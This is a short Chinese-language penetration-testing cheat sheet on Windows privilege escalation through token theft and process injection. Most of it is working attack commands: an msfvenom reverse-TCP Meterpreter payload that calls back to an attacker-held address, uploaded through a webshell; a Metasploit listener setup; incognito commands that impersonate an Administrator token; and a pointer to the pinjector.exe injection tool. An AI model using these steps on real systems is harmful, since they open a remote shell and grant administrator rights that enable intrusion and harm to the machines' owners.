令牌窃取&进程注入

令牌窃取（Windows2008年以后的就没用了）（本地权限）

Windows2008&7令牌窃取提升-本地

1. 使用Msfvenom生成木马…并通过WebShell上传至目标服务器…

命令：msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.113 lport=4444 -f exe >shell.exe

1. 在MSF进行监听….

   use exploit/multi/handler
   set payload windows/meterpreter/reverse_tcp
   set lhost 192.168.0.113
   set lport 4444
   exploit

   

2. 运行木马，获取反弹的Meterpreter Shell…

1. 使用命令假冒令牌进行提权

   use incognito        #进入incognito模块
   list_tokens -u    #列出令牌
   impersonate_token 'TEST\Administrator(具体令牌)'

   进程注入（很老的技术了，应用面不是很广）

   适用于Windows2008之前的版本（不包括Windows 2008）
   直接用工具（pinjector.exe）使用的